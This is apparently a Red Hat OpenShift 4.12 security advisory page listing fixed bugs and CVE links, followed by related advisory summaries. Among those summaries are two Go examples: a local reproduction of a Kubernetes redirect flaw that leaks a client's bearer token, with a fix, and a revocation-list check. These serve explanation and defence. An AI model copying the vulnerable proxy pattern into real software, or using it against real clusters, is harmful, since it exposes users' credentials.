OCP defaulting disparityOCPBUGS-4193 - [4.12] etcd failure: failed to make etcd client for endpoints [https://[2620:52:0:1eb:367x:5axx:xxx:xxx]:2379]: context deadline exceeded OCPBUGS-4195 - PTP 4.12 Regression - CLOCK REALTIME status is locked when physical interface is downOCPBUGS-4199 - route-controller-manager not creating routes in 4.12OCPBUGS-421 - Disconnected IPI OCP 4.10.22 cluster install on baremetal fails when hostname of master nodes does not include the text "masterOCPBUGS-4218 - highperformance irq balancing support causes the /etc/sysconfig/irqbalance to slowly grow unboundedOCPBUGS-4223 - Fix tuning plugin vlan handlingOCPBUGS-4230 - CNCC: Wrong log format for Azure lockingOCPBUGS-4234 - Updating ose-cloud-network-config-controller images to be consistent with ARTOCPBUGS-4235 - Updating ose-cloud-network-config-controller images to be consistent with ARTOCPBUGS-4250 - Backport PodNetworkConnectivityCheck for must-gatherOCPBUGS-4251 - HyperShift control plane operators have wrong priorityClassOCPBUGS-426 - [OSP][OVN]unable to create logical router policy for egressIP after update duplicate IP to uniq oneOCPBUGS-428 - Insights Operator should collect helm upgrade and uninstall metricOCPBUGS-4286 - [4.12] ovn-kubernetes ovnkube-master containers crashlooping after 4.11.0-0.okd-2022-10-15-073651 updateOCPBUGS-4292 - Backport specify resources.requests for operator podOCPBUGS-4299 - Backport Specify resources.requests for operator podOCPBUGS-4303 - Backport Specify resources.requests for operator podOCPBUGS-4308 - sanitize agent-gather outputOCPBUGS-431 - Nutanix platform validations run at `create manifests` stageOCPBUGS-4311 - [4.12] Improve ironic logging configuration in metal3OCPBUGS-4339 - oc get dc fails when AllRequestBodies audit-profile is set in apiserverOCPBUGS-4342 - The storage account for the CoreOS image is publicly accessible when deploying fully private cluster on AzureOCPBUGS-435 - Dropdown items on storageclass creation page need 
i18n supportOCPBUGS-4356 - Reply packet for DNS conversation to service IP uses pod IP as sourceOCPBUGS-4361 - [release-4.12] bp ovnkube-trace changes to 4.12OCPBUGS-4362 - Hard eviction thresholds is different with k8s default when PAO is enabledOCPBUGS-4365 - `oc-mirror` will hit error when use docker without namespace for OCI format mirrorOCPBUGS-4366 - Update Kubernetes to 1.25.4OCPBUGS-4369 - Update Cluster Sample Operator dependencies and libraries for OCP 4.13OCPBUGS-4379 - apply retry logic to ovnk-node controllersOCPBUGS-4383 - Don't log in iterateRetryResources when there are no retry entriesOCPBUGS-439 - DVO gatherer relies on the namespace nameOCPBUGS-4397 - Route/v1 defaulting for target kind and termination must be sharable between openshift-apiserver and kube-apiserverOCPBUGS-4399 - Adding back SKIP_INTERFACESOCPBUGS-4407 - Update Cluster Sample Operator dependencies and libraries for OCP 4.13OCPBUGS-4414 - [OCI feature] registries.conf support in oc mirrorOCPBUGS-4421 - Dockerfile for building ironic-image for OKD does not take into account variant scosOCPBUGS-4422 - Implement LIST call chunking in openshift-sdnOCPBUGS-4431 - KubePodNotReady - Increase Tolerance During Master Node RestartsOCPBUGS-4453 - metal-ipi upgrade success rate dropped 30+% in last weekOCPBUGS-4458 - Node Terminal tab results in errorOCPBUGS-4478 - Backport: Guard Pod Hostnames Too Long and Truncated Down Into Collisions With Other MastersOCPBUGS-4479 - [4.12] Dockerfile for building ironic-image for OKD does not take into account variant scosOCPBUGS-4484 - `oc-mirror` will hit error when use docker without namespace for OCI format mirrorOCPBUGS-4488 - Prometheus and Alertmanager incorrect ExternalURL configuredOCPBUGS-4489 - Prometheus continuously restarts due to slow WAL replayOCPBUGS-4499 - CSR are generated with incorrect Subject Alternate NamesOCPBUGS-4503 - [4.12] [OVNK] Add support for service session affinity timeoutOCPBUGS-4504 - Default to floating automaticRestart 
for new GCP instancesOCPBUGS-4505 - [4.12] Pod stuck in containerCreating state when the node on which it is running is TerminatedOCPBUGS-451 - Show Git icon in repository link in details page should be based on the git providerOCPBUGS-4526 - hypershift: csi-snapshot-controller uses wrong kubeconfigOCPBUGS-4527 - hypershift: aws-ebs-csi-driver-operator uses wrong kubeconfigOCPBUGS-4533 - [release-4.12] OVNK: NAT issue for packets exceeding check_pkt_larger() for NodePort services that route to hostNetworked podsOCPBUGS-454 - [vsphere] update install-config description for diskTypeOCPBUGS-4544 - Remove debug level logging on openshift-config-operatorOCPBUGS-4547 - CVE-2021-38561 ose-installer-container: golang: out-of-bounds read in golang.org/x/text/language leads to DoS [openshift-4]OCPBUGS-4554 - [4.12] OVN silently failing in case of a stuck podOCPBUGS-456 - [4.12] update all ironic related packages to latest bugfixOCPBUGS-4599 - Bump samples operator k8s dep to 1.25.2 for 4.12OCPBUGS-4601 - `oc-mirror` does not work as expected relative path for OCI format copy OCPBUGS-4627 - doc link in PrometheusDataPersistenceNotConfigured message is 4.8OCPBUGS-4637 - Support RHOBS monitoring for HyperShift in CNOOCPBUGS-4649 - No indication of early installation failuresOCPBUGS-4653 - [4.12] Fixes for RHCOS 9 based on RHEL 9.0OCPBUGS-4660 - Debug log messages missing from output and Info messages malformedOCPBUGS-4667 - vsphere-hostname should check that /etc/hostname is not emptyOCPBUGS-4681 - [release-4.12] remove unnecessary RBAC in KCMOCPBUGS-4686 - Removal of detection of host kubelet kubeconfig breaks IBM Cloud ROKSOCPBUGS-469 - OVN master trying to deleteLogicalPort for object which is already goneOCPBUGS-4696 - [4.12] SNO not able to bring up Provisioning resource in 4.11.17OCPBUGS-4698 - Some nmstate validations are skipped when NM config is in agent-config.yamlOCPBUGS-4721 - GCP: missing me-west1 regionOCPBUGS-4760 - [4.12] Network Policy executes duplicate 
transactions for every pod updateOCPBUGS-4763 - Revert Catalog PSA decisions for 4.13 (Marketplace)OCPBUGS-4766 - limit cluster-policy-controller RBAC permissionsOCPBUGS-4779 - Update openshift/builder release-4.12 to go1.19OCPBUGS-478 - ironic-machine-os-downloader image is missing virt-* tools in OCP 4.12 nightliesOCPBUGS-4783 - [4.12] egressIP annotations not present on OpenShift on Openstack multiAZ installationOCPBUGS-4784 - [4.12] egressIP annotation including two interfaces when multiple networksOCPBUGS-4789 - [OCP 4.12] ironic container images have old packagesOCPBUGS-4796 - OLM generates invalid component selector labelsOCPBUGS-4803 - Update formatting with gofmt for go1.19OCPBUGS-4805 - Empty/missing node-sizing SYSTEM_RESERVED_ES parameter can result in kubelet not startingOCPBUGS-4808 - Use shared library in admission to default Routes served via CRDOCPBUGS-4837 - [4.12] Pod LSP missing from PortGroupOCPBUGS-4840 - [4.12] The property TransferProtocolType is required for VirtualMedia.InsertMediaOCPBUGS-4847 - OnDelete update strategy create two replace machines when deleting a master machineOCPBUGS-4869 - AWS Deprovision Fails with unrecognized elastic load balancing resource type listener OCPBUGS-4884 - [4.12] Pods completed + deleted may leakOCPBUGS-4897 - Developer Topology always blanks with large contents when first renderingOCPBUGS-4911 - [Azure]Availability Set will be created when vmSize is invalid in a region which has zonesOCPBUGS-4943 - Need to wait longer for VM to obtain IP from DHCPOCPBUGS-4951 - OLM K8s Dependencies should be at 1.25OCPBUGS-4962 - openshift-install agent wait-for install-complete errors out before the cluster installation completesOCPBUGS-498 - Update console operator vendor with latest openshift/apiOCPBUGS-499 - ClusterOperator Conditions Update on ReorderingOCPBUGS-5019 - Fails to deprovision cluster when swift omits 'content-type' and there are empty containersOCPBUGS-505 - Input box aria-label and name wrong for 
editing PDB inside DeploymentsOCPBUGS-5067 - [4.12] coreos-installer output not available in the logsOCPBUGS-5072 - [4.12] ironic-proxy daemonset not deleted when provisioningNetwork is changed from Disabled to Managed/UnmanagedOCPBUGS-5100 - virtual media provisioning fails when iLO Ironic driver is usedOCPBUGS-514 - [OCPonRHV] CSI provisioned disks are effectively preallocated due to go-ovirt-client setting Provisioned and Initial size of the disk to the same valueOCPBUGS-5143 - provisioning on ilo4-virtualmedia BMC driver fails with error: "Creating vfat image failed: Unexpected error while running command"OCPBUGS-5156 - [release-4.12] Azure: unable to configure EgressIP if an ASG is setOCPBUGS-5185 - Dev Sandbox clusters uses clusterType OSD and there is no way to enforce DEVSANDBOXOCPBUGS-519 - publicIP is allowed in Azure disconnected installation for machinesOCPBUGS-5190 - Installer - provisioning interface on master node not getting ipv4 dhcp ip address from bootstrap dhcp server on OCP IPI BareMetal installOCPBUGS-5191 - Add support for API version v1beta1 for knativeServing and knativeEventingOCPBUGS-523 - Plugin page error boundary message is not cleared after leaving pageOCPBUGS-525 - Prerelease report bug link should be updated to JIRA instead of BugzillaOCPBUGS-5253 - Missing 'ImageContentSourcePolicy' and 'CatalogSource' in the oci fbc feature implementationOCPBUGS-527 - Misleading error message when lacking assets to create the installation imageOCPBUGS-5289 - Multus: Interface name contains an invalid character / [ocp 4.12]OCPBUGS-533 - member loses rights after some other user loginOCPBUGS-5384 - Old AWS boot images vs. 
4.12: unknown provider 'ec2'OCPBUGS-5387 - EUS upgrade: rpm-ostree clean up timeout was reachedOCPBUGS-540 - Input values in Instantiate Template are disappeared randomly in the developer consoleOCPBUGS-5417 - Upgrade from 4.11 to  4.12 with Windows machine workers (Spot Instances) failing due to: hcnCreateEndpoint failed in Win32: The object already exists.OCPBUGS-5442 - Placeholder bug for OCP 4.12.0 microshift releaseOCPBUGS-5444 - Reported vSphere Connection status is misleadingOCPBUGS-5455 - Baremetal host data is still sometimes requiredOCPBUGS-5474 - [4.12]Default CatalogSource aren't created in restricted modeOCPBUGS-548 - The application dropdown menu uses a custom component with a configuration to favorite applications, similar to the Project selection menu, but is inconsistent in the way it looks and behaves.OCPBUGS-561 - [4.12] Bootimage bump trackerOCPBUGS-569 - CVO History Pruner is non-functional, letting history length above MaxHistoryOCPBUGS-575 - The lacking securityContext.seccompProfile.type of OLM deployments is blocking OCP upgrade to 4.12OCPBUGS-576 - unbound router_id variable while creating eventOCPBUGS-585 - Tuned overwriting IRQBALANCE_BANNED_CPUSOCPBUGS-595 - Kubelet cannot be started on worker nodes after upgrade to OCP 4.11 (RHCOS 8.6) when custom SELinux policies are appliedOCPBUGS-613 - oc adm inspect --rotated-pod-logs not working properly for static podsOCPBUGS-617 - oc-mirror does not mirror arm64 OCP release payloadOCPBUGS-643 - catsrc is not ready due to "compute digest: compute hash: write tar: open /tmp/cache/cache: permission denied"OCPBUGS-650 - "opm alpha render-veneer semver" raise error when no "Candidate" in config yamlOCPBUGS-651 - CBO gets confused by Terminating ports when a master failsOCPBUGS-670 - Prefer local dns does not work expectedly on OCPv4.12OCPBUGS-675 - panic in etcdcliOCPBUGS-69 - No event log was emitted when egressIP exceeds capacity limit for cloud providers with SDN pluginOCPBUGS-690 - [2112237] [ 
Cluster storage Operator 4.x(10/11/12) ] DefaultStorageClassController report fake message "No default StorageClass for this platform" on Alicloud, IBM, NutanixOCPBUGS-705 - vSphere privilege checking failing when providing user-defined folder and/or resource poolOCPBUGS-706 - [IBMCloud] e2e-ibmcloud-ipi-ibmcloud-gather-resources failsOCPBUGS-716 - EventsRecorder nonstandard / log onlyOCPBUGS-717 - Inquiries from customers regarding the EOL of Python 3.7.OCPBUGS-718 - Inefficient use of SG rules when creating Service LBs leads to scale issuesOCPBUGS-722 - Undiagnosed panic detected in pod: openshift-controller-manager-operator_openshift-controller-manager-operator invalid memory address or nil pointer dereferenceOCPBUGS-729 - vsphere privilege check fails on vsphere6.7 u3 as missing privilege "InventoryService.Tagging.ObjectAttachable" OCPBUGS-745 - [4.12] Supermicro server FirmwareSchema CR does not contain allowable_values, attribute_type and read_only flagOCPBUGS-753 - dns-default pod missing "target.workload.openshift.io/management:" annotationOCPBUGS-766 - Missing the instance-type/region/zone labels in Machine CRsOCPBUGS-78 - Uninstalled operator can't be reinstalled if it included a conversion webhookOCPBUGS-785 - Bump documentationBaseURL to 4.12OCPBUGS-800 - Name of workload get changed, when project and image stream gets changed on reloading the form on the edit deployment page of the workloadOCPBUGS-819 - [ExtDNS] Invalid TXT records for wildcard domains on AzureOCPBUGS-825 - Available=False with no reasonOCPBUGS-850 - Dockerfile: provide full URL to CentOS stream image OCPBUGS-852 - oc debug requires a user to create a namespace with specific security labelsOCPBUGS-853 - openshift-ingress-operator is failing to update router-certs because "Too long: must have at most 1048576 bytes" messageOCPBUGS-858 - package-server-manager does not migrate packageserver CSV from v0.17.0 to v0.18.3 on OCP 4.8 -> 4.9 upgradeOCPBUGS-861 - Rebase openshift/etcd 4.12 onto 
v3.5.5OCPBUGS-864 - ClusterOperator Conditions Update on ReorderingOCPBUGS-867 - package-server-manager does not stomp on changes made to packgeserver CSVOCPBUGS-869 - Change 'OpenShift Managed (Azure)' to 'Azure Red Hat OpenShift' for Azure support case linkOCPBUGS-872 - provisioning interface on master node not getting ipv4 dhcp ip address from bootstrap dhcp server on OCP IPI BareMetal installOCPBUGS-884 - Update RHCOS release browser urlOCPBUGS-889 - 4.12 installer is pointing at stable-4.11 channelOCPBUGS-917 - create egressqos with wrong syntax/value rules successOCPBUGS-926 - [vsphere-problem-detector] report privilege missing when using pre-existing folder and/or resource pool with ReadOnly permissionOCPBUGS-927 - Azure install fails in CI: Error: error creating/updating Private DNS Zone Virtual network link OCPBUGS-929 - The help message of "opm alpha render-graph" is not correctOCPBUGS-939 - Flaky CI: Object.verifyTopologyPage timeout after importing a DevfileOCPBUGS-943 - Could not import Devfile after testing a non-Devfile versionOCPBUGS-944 - CI failure due to pod security in manilaOCPBUGS-946 - Warnings in storage cluster operator PowerVS CSI driver deployment OCPBUGS-954 - [2087981] PowerOnVM_Task is deprecated use PowerOnMultiVM_Task for DRS ClusterRecommendationOCPBUGS-959 - Born in 4.1 and 4.2 clusters have 'openshift.io/run-level: 1' unclearedOCPBUGS-963 - [OCPonOpenstack] Remove clustername length limitationOCPBUGS-967 - Panic in test:  [sig-network] IngressClass [Feature:Ingress] should prevent Ingress creation if more than 1 IngressClass marked as default [Serial] [Suite:openshift/conformance/serial] OCPBUGS-977 - SR-IOV MutiNetworkPolicy: Rules are not removed after disabling multinetworkpolicyOCPBUGS-978 - leases not gracefully released in OCMOCPBUGS-985 - Metal serial tests are failing on webhook admission about provisioningDHCPRangeOCPBUGS-987 - Whereabouts should allow non default interfaces to Pod IP listOCPBUGS-990 - HyperShift 4.12 
jobs fail to install csi-snapshot-controller-operatorOCPBUGS-999 - aws driver toolkit jobs are permafailing6. References:https://access.redhat.com/security/cve/CVE-2021-4235https://access.redhat.com/security/cve/CVE-2021-22570https://access.redhat.com/security/cve/CVE-2021-38561https://access.redhat.com/security/cve/CVE-2022-1705https://access.redhat.com/security/cve/CVE-2022-2879https://access.redhat.com/security/cve/CVE-2022-2880https://access.redhat.com/security/cve/CVE-2022-2995https://access.redhat.com/security/cve/CVE-2022-3162https://access.redhat.com/security/cve/CVE-2022-3172https://access.redhat.com/security/cve/CVE-2022-3259https://access.redhat.com/security/cve/CVE-2022-3466https://access.redhat.com/security/cve/CVE-2022-21698https://access.redhat.com/security/cve/CVE-2022-24302https://access.redhat.com/security/cve/CVE-2022-27664https://access.redhat.com/security/cve/CVE-2022-30631https://access.redhat.com/security/cve/CVE-2022-32148https://access.redhat.com/security/cve/CVE-2022-32189https://access.redhat.com/security/cve/CVE-2022-32190https://access.redhat.com/security/cve/CVE-2022-41316https://access.redhat.com/security/cve/CVE-2022-41715https://access.redhat.com/security/cve/CVE-2022-42010https://access.redhat.com/security/cve/CVE-2022-42011https://access.redhat.com/security/cve/CVE-2022-42012https://access.redhat.com/security/cve/CVE-2022-42898https://access.redhat.com/security/cve/CVE-2023-0296https://access.redhat.com/security/updates/classification/#moderate7. Contact:The Red Hat security contact is <[email protected]>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2023 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG 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oXLl-----END PGP SIGNATURE-------RHSA-announce mailing [email protected]://listman.redhat.com/mailman/listinfo/rhsa-announce

Related news

Red Hat Security Advisory 2024-0485-03

Red Hat Security Advisory 2024-0485-03 - Red Hat OpenShift Container Platform release 4.12.48 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a cross site scripting vulnerability.

CVE-2022-3172: Aggregated API server can cause clients to be redirected (SSRF) · Issue #112513 · kubernetes/kubernetes

A security issue was discovered in kube-apiserver that allows an aggregated API server to redirect client traffic to any URL. This could lead to the client performing unexpected actions as well as forwarding the client's API server credentials to third parties.
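The redirect path described above, as an added example that is neither kube-apiserver's code nor taken from the issue: three in-process httptest servers play the client-facing aggregator, a malicious aggregated API server, and the third party it redirects to. The API path, loopback hostnames and bearer token are constructed for the demo, and the rejectRedirects branch is a simplified stand-in for the fix (turn a 3xx from the backend into a 502 so the client never sees the Location header), not the upstream patch itself.

```go
package main

// Added example, not kube-apiserver's code: a miniature aggregator proxy showing
// how a redirecting aggregated API server leaks the caller's bearer token and
// how rejecting backend redirects stops it. Servers, path and token are constructed.

import (
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"sync"
)

// ConstructedToken stands in for the bearer token a kubectl user presents.
const ConstructedToken = "constructed-example-token"

// tokenSink is the third party the malicious backend points clients at; it
// records every Authorization header that reaches it.
type tokenSink struct {
	mu     sync.Mutex
	tokens []string
}

func (s *tokenSink) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	s.mu.Lock()
	defer s.mu.Unlock()
	if v := r.Header.Get("Authorization"); v != "" {
		s.tokens = append(s.tokens, v)
	}
	fmt.Fprint(w, "captured")
}

// newAggregatorProxy forwards API traffic to the aggregated API server. With
// rejectRedirects=false it relays whatever the backend answers, including a 3xx
// with a backend-chosen Location (the vulnerable behaviour). With
// rejectRedirects=true such a 3xx becomes a 502 and the client never sees the
// Location; this mirrors the shape of the upstream fix, not its code.
func newAggregatorProxy(backend *url.URL, rejectRedirects bool) http.Handler {
	rp := httputil.NewSingleHostReverseProxy(backend)
	if rejectRedirects {
		rp.ModifyResponse = func(resp *http.Response) error {
			if resp.StatusCode >= 300 && resp.StatusCode < 400 && resp.Header.Get("Location") != "" {
				return errors.New("the backend attempted to redirect this request, which is not permitted")
			}
			return nil
		}
		rp.ErrorHandler = func(w http.ResponseWriter, _ *http.Request, err error) {
			http.Error(w, err.Error(), http.StatusBadGateway)
		}
	}
	return rp
}

// Outcome is the status the client finally saw and the tokens the third party captured.
type Outcome struct {
	ClientStatus int
	Leaked       []string
}

// RunScenario wires client -> aggregator proxy -> malicious backend -> third party.
func RunScenario(rejectRedirects bool) (Outcome, error) {
	sink := &tokenSink{}
	thirdParty := httptest.NewServer(sink)
	defer thirdParty.Close()
	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, thirdParty.URL+"/collect", http.StatusFound) // malicious aggregated API server
	}))
	defer backend.Close()
	backendURL, err := url.Parse(backend.URL)
	if err != nil {
		return Outcome{}, err
	}
	proxy := httptest.NewServer(newAggregatorProxy(backendURL, rejectRedirects))
	defer proxy.Close()
	// The client presents its token to the "API server" and, like Go's default
	// client, follows redirects. All servers share the 127.0.0.1 hostname, so
	// net/http keeps the Authorization header on the redirected request.
	req, err := http.NewRequest(http.MethodGet, proxy.URL+"/apis/example.io/v1/things", nil)
	if err != nil {
		return Outcome{}, err
	}
	req.Header.Set("Authorization", "Bearer "+ConstructedToken)
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return Outcome{}, err
	}
	defer resp.Body.Close()
	io.Copy(io.Discard, resp.Body)
	sink.mu.Lock()
	defer sink.mu.Unlock()
	return Outcome{ClientStatus: resp.StatusCode, Leaked: append([]string(nil), sink.tokens...)}, nil
}

func main() {
	for _, reject := range []bool{false, true} {
		out, err := RunScenario(reject)
		fmt.Printf("rejectRedirects=%v status=%d leaked=%q err=%v\n", reject, out.ClientStatus, out.Leaked, err)
	}
}
```

Run with `go run`: the first line shows the bearer token arriving at the third party through the vulnerable proxy with a 200 back to the client, the second shows the hardened proxy answering 502 with nothing captured. The check lives in the proxy rather than the client on purpose: clients cannot be trusted to refuse redirects, and the aggregator is the one component that knows a 3xx came from an extension server rather than from kube-apiserver itself.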

Gentoo Linux Security Advisory 202309-06

Gentoo Linux Security Advisory 202309-06 - Multiple vulnerabilities have been discovered in Samba, the worst of which could result in root remote code execution. Versions less than 4.18.4 are affected.

CVE-2022-3466

The version of cri-o as released for Red Hat OpenShift Container Platform 4.9.48, 4.10.31, and 4.11.6 via RHBA-2022:6316, RHBA-2022:6257, and RHBA-2022:6658, respectively, included an incorrect version of cri-o missing the fix for CVE-2022-27652, which was previously fixed in OCP 4.9.41 and 4.10.12 via RHBA-2022:5433 and RHSA-2022:1600. This issue could allow an attacker with access to programs with inheritable file capabilities to elevate those capabilities to the permitted set when execve(2) runs. For more details, see https://access.redhat.com/security/cve/CVE-2022-27652.

Red Hat Security Advisory 2023-4674-01

Red Hat Security Advisory 2023-4674-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.30.

Red Hat Security Advisory 2023-4488-01

Red Hat Security Advisory 2023-4488-01 - Red Hat OpenShift support for Windows Containers allows you to deploy Windows container workloads running on Windows Server containers.

Red Hat Security Advisory 2023-4053-01

Red Hat Security Advisory 2023-4053-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.45. Issues addressed include a code execution vulnerability.

GHSA-9mh8-9j64-443f: HashiCorp Vault's revocation list not respected

HashiCorp Vault and Vault Enterprise’s TLS certificate auth method did not initially load the optionally configured CRL issued by the role's CA into memory on startup, resulting in the revocation list not being checked if the CRL has not yet been retrieved. Fixed in 1.12.0, 1.11.4, 1.10.7, and 1.9.10.
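The failure mode described above, as an added example that is not HashiCorp's code: a client-certificate check that treats a configured-but-not-yet-loaded CRL as a hard failure instead of as "nothing revoked". The CA, the two leaf certificates and the CRL are generated in-process with Go's crypto/x509, the names and serials are constructed, and the failClosed flag switches between the buggy and the corrected behaviour.

```go
package main

// Added example, not Vault's code: a TLS client-certificate check that fails
// closed while the configured CRL is not loaded. All names here are constructed.

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"math/big"
	"time"
)

var ErrNoCRL = errors.New("CRL configured but not loaded; refusing to authenticate")
var ErrRevoked = errors.New("certificate serial is listed on the CRL")
var ErrStale = errors.New("CRL is past its NextUpdate")

// Fixture is a throwaway PKI: a CA, one valid leaf, one revoked leaf, and the CRL.
type Fixture struct {
	CA, Good, Revoked *x509.Certificate
	CRLDER            []byte
}

func check(err error) { // keeps the fixture builder short; a service would return the error
	if err != nil {
		panic(err)
	}
}

func NewFixture(now time.Time) *Fixture {
	caKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	check(err)
	caTmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "constructed-example-ca"},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
		IsCA: true, BasicConstraintsValid: true,
		KeyUsage: x509.KeyUsageCertSign | x509.KeyUsageCRLSign, // CRLSign is required to sign the CRL
	}
	caDER, err := x509.CreateCertificate(rand.Reader, caTmpl, caTmpl, &caKey.PublicKey, caKey)
	check(err)
	ca, err := x509.ParseCertificate(caDER)
	check(err)
	issue := func(serial int64, cn string) *x509.Certificate {
		key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
		check(err)
		tmpl := &x509.Certificate{
			SerialNumber: big.NewInt(serial), Subject: pkix.Name{CommonName: cn},
			NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
			KeyUsage:    x509.KeyUsageDigitalSignature,
			ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
		}
		der, err := x509.CreateCertificate(rand.Reader, tmpl, ca, &key.PublicKey, caKey)
		check(err)
		leaf, err := x509.ParseCertificate(der)
		check(err)
		return leaf
	}
	good, revoked := issue(1001, "alice"), issue(1002, "mallory")
	crlDER, err := x509.CreateRevocationList(rand.Reader, &x509.RevocationList{ // revokes only "mallory"
		Number: big.NewInt(1), ThisUpdate: now.Add(-time.Minute), NextUpdate: now.Add(time.Hour),
		RevokedCertificates: []pkix.RevokedCertificate{{SerialNumber: revoked.SerialNumber, RevocationTime: now.Add(-time.Minute)}},
	}, ca, caKey)
	check(err)
	return &Fixture{CA: ca, Good: good, Revoked: revoked, CRLDER: crlDER}
}

// VerifyClientCert validates the chain, then consults the CRL. crlDER == nil
// models "CRL configured but not fetched yet": failClosed=false reproduces the
// bug described above (nothing loaded, so nothing is rejected); failClosed=true
// refuses every client until a fresh, CA-signed CRL is in memory.
func VerifyClientCert(leaf, ca *x509.Certificate, crlDER []byte, now time.Time, failClosed bool) error {
	roots := x509.NewCertPool()
	roots.AddCert(ca)
	opts := x509.VerifyOptions{Roots: roots, CurrentTime: now, KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}}
	if _, err := leaf.Verify(opts); err != nil {
		return err
	}
	if crlDER == nil {
		if failClosed {
			return ErrNoCRL
		}
		return nil // the buggy path: a missing CRL is silently treated as "nothing revoked"
	}
	crl, err := x509.ParseRevocationList(crlDER)
	if err == nil {
		err = crl.CheckSignatureFrom(ca) // never trust a CRL the CA did not sign
	}
	if err != nil {
		return err
	}
	if now.After(crl.NextUpdate) {
		return ErrStale
	}
	for _, rc := range crl.RevokedCertificates {
		if rc.SerialNumber.Cmp(leaf.SerialNumber) == 0 {
			return ErrRevoked
		}
	}
	return nil
}
```

The ordering matters: chain validation first, then the revocation decision, and the revocation decision has exactly three acceptable outcomes (fresh CA-signed CRL that does not list the serial, fresh CA-signed CRL that does, or no usable CRL, which is a refusal). A service that instead returns nil whenever its in-memory CRL is empty cannot tell "nothing revoked" apart from "nothing fetched yet", which is the gap the advisory describes.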

Red Hat Security Advisory 2023-3915-01

Red Hat Security Advisory 2023-3915-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.44.

Red Hat Security Advisory 2023-3615-01

Red Hat Security Advisory 2023-3615-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.22. Issues addressed include a denial of service vulnerability.

RHSA-2023:3615: Red Hat Security Advisory: OpenShift Container Platform 4.12.22 bug fix and security update

Red Hat OpenShift Container Platform release 4.12.22 is now available with updates to packages and images that fix several bugs and add enhancements. This release includes a security update for Red Hat OpenShift Container Platform 4.12. Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-4235: A flaw was found in go-yaml. This issue occurs due to unbounded alias chasing, where a maliciously crafted YAML file can cause the system to consume significant system resources. If p...

Red Hat Security Advisory 2023-3742-02

Red Hat Security Advisory 2023-3742-02 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. Issues addressed include bypass, denial of service, and remote SQL injection vulnerabilities.

RHSA-2023:3742: Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.13.0 security and bug fix update

Updated images that include numerous enhancements, security, and bug fixes are now available in Red Hat Container Registry for Red Hat OpenShift Data Foundation 4.13.0 on Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2020-16250: A flaw was found in Vault and Vault Enterprise (“Vault”). In the affected versions of Vault, with the AWS Auth Method configured and under certain circumstances, the values relied upon by Vault to validate AWS IAM ident...

Red Hat Security Advisory 2023-3644-01

Red Hat Security Advisory 2023-3644-01 - Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation. This advisory covers container images for the release.

Red Hat Security Advisory 2023-3609-01

Red Hat Security Advisory 2023-3609-01 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform.

RHSA-2023:3644: Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.4.0

Red Hat OpenShift Service Mesh Containers for 2.4.0 Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-24540: A flaw was found in golang, where not all valid JavaScript white-space characters were considered white space. Due to this issue, templates containing white-space characters outside of the character set "\t\n\f\r\u0020\u2028\u2029" in JavaScript contexts that also contain actions may not be properly sanitized during execution.

RHSA-2023:3609: Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.12.4 security and Bug Fix update

